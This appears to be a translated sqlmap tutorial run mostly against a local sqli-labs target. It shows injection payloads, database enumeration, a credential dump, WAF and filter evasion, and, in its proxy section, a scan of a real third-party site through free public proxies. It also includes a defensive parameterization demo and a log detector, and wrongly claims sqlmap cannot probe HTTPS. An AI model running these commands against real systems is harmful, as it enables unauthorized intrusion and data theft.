1.1 Introduction to SQLMAP
1.1.1 sqlmap vulnerability detection types
- Boolean-based blind detection
- Time-based blind detection
- Error-based detection
- UNION query-based detection
- Stacked query-based detection
1.2 Using SQLMAP
1.2.1 SQLMAP help
# sqlmap -h
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'
1.2.1.1 Commonly used options
- -hh: show the advanced help
- -u: specify the URL to probe
- -m: scan multiple targets listed in a file
- -r: load the target URL and injection point from an HTTP request file
- -l: probe the targets recorded in a Burp Suite or WebScarab log file
- -b: retrieve the DBMS banner, which identifies the database type
- --dbs: enumerate the available database names
- -D: specify the database whose table names to enumerate
- --tables: enumerate table names
- -T: specify the table whose column names to enumerate
- --columns: enumerate column names
- -C: specify the columns to retrieve data from
- --dump: dump the retrieved database entries
- --users: enumerate database user names
- --passwords: enumerate the password hashes of the database users
- --batch: use the default answer for every prompt, so the probe runs without interactive questions
- --user-agent: set the User-Agent header value
- --random-agent: use a randomly chosen User-Agent value
- --proxy: probe through the given proxy
- --delay: delay between requests, in seconds
- --proxy-file: load multiple proxies from a file
- --level: test level (1-5). By default sqlmap tests all GET and POST parameters; at level 2 or higher it also tests cookie parameters, at level 3 or higher the User-Agent and Referer headers, and at level 5 the Host header
- --current-db: retrieve the current database
- --current-user: retrieve the user currently logged in to the database
- --tamper=space2comment,between: obfuscation scripts for getting past application-layer filters, IPS and WAFs; space2comment replaces spaces with /**/ and between replaces the greater-than sign > with BETWEEN
- --hex: character-encoding problems can sometimes lose data; this option uses the DBMS hex function so that non-ASCII content is hex-encoded when dumped and decoded back after retrieval
- --drop-set-cookie: when the server updates the cookie via Set-Cookie, ignore the update
- --time-sec: response delay used for time-based injection detection (default 5 seconds)
- --file-read: read a file from the remote system to the local machine
- --technique=TECH: use only the given technique types (BEUSTQ); all are used by default
  - B: Boolean-based blind
  - E: Error-based
  - U: Union query-based
  - S: Stacked queries (file system, operating system and registry related injection)
  - T: Time-based blind
Note: when sqlmap is used to read files on the target system, run commands on it, or read the target's registry (Windows), technique S must be included.
1.2.2 Probing a single target
1.2.2.1 Running the probe
To test a single URL for SQL injection, use the -u or --url option:
# sqlmap -u http://192.168.10.159/sqli-labs/Less-1/?id=1
sqlmap reports that the back-end database appears to be MySQL and asks whether to skip the test payloads for other databases; answer y to skip them.
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
For the remaining tests, it asks whether to include all tests for 'MySQL' extending the provided level (1) and risk (1) values; answer Y.
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
sqlmap finds that the id parameter is vulnerable and asks whether to keep testing the other parameters; answer y.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
1.2.2.2 Probe results
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5563 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(5563=5563,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NFrs'='NFrs

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2923 FROM (SELECT(SLEEP(5)))PexQ) AND 'PnAx'='PnAx

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3315' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717071,0x7a4b49646f774f436f474e434a706647745a44676d536c4f764f4f6149615a716b487946726a6358,0x716b717071)-- -
---
[10:47:44] [INFO] the back-end DBMS is MySQL
[10:47:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
web server operating system: Linux CentOS 7
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
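Why the boolean-based payload in the output above gives sqlmap a usable signal, and what removes that signal, shown as an added example that is not part of the original post and not the lab's code: the post does not show the PHP/MySQL source behind Less-1, so this is a constructed Python/sqlite3 stand-in with the query built once by string concatenation and once with a bound parameter. The table rows and the "false" variant of the payload are constructed; the "true" payload is the one sqlmap reported for the id parameter.

```python
"""Added example: a concatenated query that yields a boolean-based blind
injection point, next to its parameterized fix.

Uses sqlite3 so it runs offline. The lab's real PHP/MySQL source is not
shown in the post, so this is a constructed stand-in, not the lab code.
"""
import sqlite3

# Payload sqlmap reported above for the 'id' parameter (an always-true probe).
TRUE_PAYLOAD = "1' AND 4290=4290 AND 'Udod'='Udod"
# Constructed counterpart with the same shape but a false comparison.
FALSE_PAYLOAD = "1' AND 4290=4291 AND 'Udod'='Udod"


def make_db():
    """In-memory users table with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con


def lookup_vulnerable(con, user_id):
    """The pattern behind the injection point: the parameter is pasted into
    the SQL text, so a quote inside it closes the literal and the remainder
    is parsed as SQL."""
    sql = "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 1"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, user_id):
    """Bound parameter: the whole value is compared as data, quotes included,
    so the true and false probes produce the same (empty) result."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return [row[0] for row in con.execute(sql, (user_id,))]


def response_differs(lookup, con):
    """True when the true/false probes are distinguishable, which is the
    difference boolean-based blind detection (technique B) relies on."""
    return lookup(con, TRUE_PAYLOAD) != lookup(con, FALSE_PAYLOAD)


if __name__ == "__main__":
    con = make_db()
    print("vulnerable query distinguishable:", response_differs(lookup_vulnerable, con))  # True
    print("parameterized query distinguishable:", response_differs(lookup_safe, con))    # False
```

The concatenated version returns the Dumb row for the true probe and nothing for the false one, which is exactly the response difference sqlmap needs; with the bound parameter both probes fall through to an empty result, and the quote in the value never reaches the SQL parser.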
1.2.3 Probing multiple targets
1.2.3.1 Create a file listing the target URLs
# vim sqlmap.txt
http://192.168.10.159/sqli-labs/Less-1/?id=1
http://192.168.10.159/sqli-labs/Less-2/?id=1
http://192.168.10.159/sqli-labs/Less-3/?id=1
1.2.3.2 Run the probe
# sqlmap -m sqlmap.txt --dbs --users --batch
1.2.3.3 Probe results
[13:45:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:45:46] [INFO] fetching database users
database management system users [6]:
[*] ''@'centos7-sqlilabs'
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'centos7-sqlilabs'
[*] 'root'@'localhost'

[13:45:46] [INFO] fetching database names
[13:45:46] [INFO] resumed: 'information_schema'
[13:45:46] [INFO] resumed: 'challenges'
[13:45:46] [INFO] resumed: 'mysql'
[13:45:46] [INFO] resumed: 'performance_schema'
[13:45:46] [INFO] resumed: 'security'
[13:45:46] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
1.2.4 Probing from a saved HTTP request file
After logging in, refresh the page and capture the request headers, including the cookie:
# vim cookie.txt
GET /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.159/sqli-labs/Less-20/
Connection: close
Cookie: uname=admin*
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1.2.4.3 Run the probe
# sqlmap -r cookie.txt --level 3 --batch --dbs
1.2.4.4 Probe results
[14:20:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:20:32] [INFO] fetching database names
[14:20:32] [INFO] retrieved: 'information_schema'
[14:20:32] [INFO] retrieved: 'challenges'
[14:20:32] [INFO] retrieved: 'mysql'
[14:20:32] [INFO] retrieved: 'performance_schema'
[14:20:32] [INFO] retrieved: 'security'
[14:20:32] [INFO] retrieved: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
1.2.5 Probing from a Burp Suite log
1.2.5.1 Enable logging in Burp Suite
1.2.5.2 Browse the target paths so Burp Suite records them
Turn on Burp Suite's intercept, visit several URLs and Forward them all.
View the log contents:
# cat /home/pinming/Documents/burpsuite.txt
======================================================
2:57:15 PM  http://192.168.10.159:80
======================================================
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=p4htta40u6nis7p003jb4ihcg5
Upgrade-Insecure-Requests: 1
......
1.2.5.3 Run the probe
# sqlmap -l /home/pinming/Documents/burpsuite.txt --level 3 --dbs --batch
1.2.5.4 Probe results
[14:59:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:59:01] [INFO] fetching database names
[14:59:01] [INFO] resumed: 'information_schema'
[14:59:01] [INFO] resumed: 'challenges'
[14:59:01] [INFO] resumed: 'mysql'
[14:59:01] [INFO] resumed: 'performance_schema'
[14:59:01] [INFO] resumed: 'security'
[14:59:01] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
1.2.6 Specifying the injection technique
1.2.6.1 Boolean-based probing only
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --technique=B --batch
1.2.6.2 Probe results
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod
---
[15:10:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
1.2.7 Enumerating database information
1.2.7.1 Retrieve database names
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dbs
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
1.2.7.2 Retrieve table names
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
1.2.7.3 Retrieve column names
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables --columns
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Database: security
Table: referers
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| referer    | varchar(256) |
+------------+--------------+

Database: security
Table: uagents
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| uagent     | varchar(256) |
| username   | varchar(20)  |
+------------+--------------+

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email_id | varchar(30) |
| id       | int(3)      |
+----------+-------------+
1.2.7.4 Retrieve column data
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dump -D security -T users -C "username,password"
Database: security
Table: users
[15 entries]
+------------+------------+
| username   | password   |
+------------+------------+
| Dumb       | Dumb       |
| Angelina   | I-kill-you |
| Dummy      | p@ssword   |
| secure     | crappy     |
| stupid     | stupidity  |
| superman   | genious    |
| batman     | mob!le     |
| admin      | 654321     |
| admin1     | admin1     |
| admin2     | admin2     |
| admin3     | admin3     |
| dhakkan    | dumbo      |
| admin4     | admin4     |
| admin'-- + | 123456     |
| root       | 123456     |
+------------+------------+
1.3 SQLMAP request parameters
1.3.1 Default values
Capturing the traffic shows that SQLMAP's User-Agent is sqlmap/1.6.5#stable (https://sqlmap.org)
This signature is very distinctive, and a site administrator can use it to filter our requests.
1.3.2 Changing the default request values
1.3.2.1 Setting the User-Agent
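The distinctive User-Agent just described, and the five detection types listed in section 1.1.1, can both be recognised on the server side. What follows is an added example, not code from the original post or from the sqlmap project: a Python script that reads lines in Apache combined log format, flags the default sqlmap User-Agent, and labels each request URI with the technique letters (B/E/U/S/T, as in --technique) its query string resembles. The log lines are constructed for this example; their payloads are the ones sqlmap reported in section 1.2.2.2, two of them sent with a spoofed browser User-Agent as in section 1.3.2. The pattern list is deliberately small and is a starting point to tune against real traffic, not a complete signature set.

```python
"""Added example: flag sqlmap-style probing in web server access logs."""
import re
from urllib.parse import unquote_plus

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Technique letters follow sqlmap's --technique option. Each pattern is a
# narrow marker of that technique as seen in the payloads above; a real
# deployment would extend and tune these against its own traffic.
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\bAND\s+(?:(\d+)\s*=\s*\1|'(\w+)'\s*=\s*'\2)", re.I),
    "E": re.compile(r"\b(?:FLOOR\s*\(\s*RAND\s*\(|EXTRACTVALUE\s*\(|UPDATEXML\s*\()", re.I),
    "U": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "S": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I),
    "T": re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
}

# Constructed sample log: one benign request, two with the default sqlmap
# User-Agent, two with a spoofed browser User-Agent.
SAMPLE_LOG = """
192.168.10.20 - - [10/Aug/2022:10:47:40 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 721 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
192.168.10.20 - - [10/Aug/2022:10:47:44 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%204290%3D4290%20AND%20%27Udod%27%3D%27Udod HTTP/1.1" 200 721 "-" "sqlmap/1.6.5#stable (https://sqlmap.org)"
192.168.10.20 - - [10/Aug/2022:10:47:44 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%20(SELECT%205563%20FROM(SELECT%20COUNT(*),CONCAT(0x7170717071,(SELECT%20(ELT(5563%3D5563,1))),0x716b717071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27NFrs%27%3D%27NFrs HTTP/1.1" 500 1203 "-" "sqlmap/1.6.5#stable (https://sqlmap.org)"
192.168.10.20 - - [10/Aug/2022:10:47:50 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%20(SELECT%202923%20FROM%20(SELECT(SLEEP(5)))PexQ)%20AND%20%27PnAx%27%3D%27PnAx HTTP/1.1" 200 721 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
192.168.10.20 - - [10/Aug/2022:10:47:51 +0800] "GET /sqli-labs/Less-1/?id=-3315%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170717071,0x7a4b49,0x716b717071)--%20- HTTP/1.1" 200 760 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"""


def is_sqlmap_agent(agent: str) -> bool:
    """sqlmap's default User-Agent is 'sqlmap/<version> (https://sqlmap.org)'."""
    lowered = agent.lower()
    return lowered.startswith("sqlmap/") or "sqlmap.org" in lowered


def classify_techniques(uri: str) -> str:
    """Return the technique letters (in BEUST order) whose pattern matches
    the percent-decoded URI; empty string when nothing matches."""
    decoded = unquote_plus(uri)
    return "".join(letter for letter, pat in TECHNIQUE_PATTERNS.items() if pat.search(decoded))


def analyze(log_text: str) -> list:
    """Parse combined-format lines and keep those that carry either the
    sqlmap User-Agent or a technique marker in the URI."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        agent_hit = is_sqlmap_agent(m["agent"])
        techniques = classify_techniques(m["uri"])
        if agent_hit or techniques:
            findings.append({"client": m["client"], "time": m["time"], "uri": m["uri"],
                             "sqlmap_agent": agent_hit, "techniques": techniques})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The two spoofed-agent lines show why the User-Agent alone is a weak control: once --user-agent or --random-agent is used, only the request content still gives the probing away, which is what the technique patterns are for.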
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --batch

After setting it with the --user-agent option, the captured User-Agent is the value we supplied, so the administrator's filter no longer matches our requests.
1.3.2.2 Randomizing the User-Agent
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --random-agent --batch

1.3.3 Probing through a proxy
Free proxy list: https://www.kuaidaili.com/free/inha/
When probing through a proxy, internal-network targets cannot be reached unless the target is also accessible from the public internet.
1.3.3.1 Using a single proxy
# sqlmap -u "http://www.baidu.com" --proxy "http://202.55.5.209:8090" --delay="1" --random-agent --batch
1.3.3.2 Using multiple proxies
# vim proxy.txt
http://183.247.199.114:30001
http://183.247.211.50:30001
http://122.9.101.6:8888
# sqlmap -u "http://www.baidu.com" --proxy-file=/root/proxy.txt --delay="1" --random-agent --batch
1.3.3.3 HTTPS probing
Since SQLmap does not support probing HTTPS directly, start Burp Suite locally and probe through the local proxy:
# sqlmap -u "https://www.baidu.com" --proxy "http://127.0.0.1:8080" --delay="1" --random-agent --batch
